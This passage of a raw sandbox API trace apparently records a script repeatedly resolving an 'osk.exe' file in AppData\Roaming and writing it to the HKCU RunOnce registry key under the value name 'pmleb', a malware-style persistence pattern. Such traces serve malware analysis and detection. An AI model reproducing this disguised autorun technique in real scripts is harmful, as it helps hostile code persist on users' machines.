riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.797] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.797] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4c [0081.798] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0081.798] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4d [0081.798] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.798] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4c [0081.798] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.799] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.799] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.799] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.799] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.799] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.799] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.799] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.799] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.799] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.799] RegCloseKey (hKey=0x280) returned 0x0 [0081.799] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.800] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.800] SetTimer (hWnd=0x20280, nIDEvent=0x20c8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c8 [0081.800] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.812] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0081.812] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.812] KillTimer (hWnd=0x20280, uIDEvent=0x20c8) returned 1 [0081.813] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.813] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.813] IUnknown:Release (This=0x787518) returned 0x1 [0081.813] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.813] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.813] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.813] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.814] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4d [0081.814] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.814] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4e [0081.814] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.815] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4d [0081.815] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.815] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.815] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.815] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.815] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.815] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.815] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.815] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.815] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.815] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.816] RegCloseKey (hKey=0x280) returned 0x0 [0081.816] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.816] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.816] SetTimer (hWnd=0x20280, nIDEvent=0x20c9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c9 [0081.816] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.827] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.827] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.828] KillTimer (hWnd=0x20280, uIDEvent=0x20c9) returned 1 [0081.828] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.828] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.828] IUnknown:Release (This=0x787518) returned 0x1 [0081.828] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.828] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.828] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.828] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.829] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.829] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4e [0081.829] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.829] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4f [0081.829] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.830] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4e [0081.830] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.830] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.830] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.830] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.830] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.830] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.830] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.830] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.830] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.830] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.831] RegCloseKey (hKey=0x280) returned 0x0 [0081.831] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.831] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.831] SetTimer (hWnd=0x20280, nIDEvent=0x20ca, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ca [0081.831] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.843] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.843] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.843] KillTimer (hWnd=0x20280, uIDEvent=0x20ca) returned 1 [0081.843] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.843] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
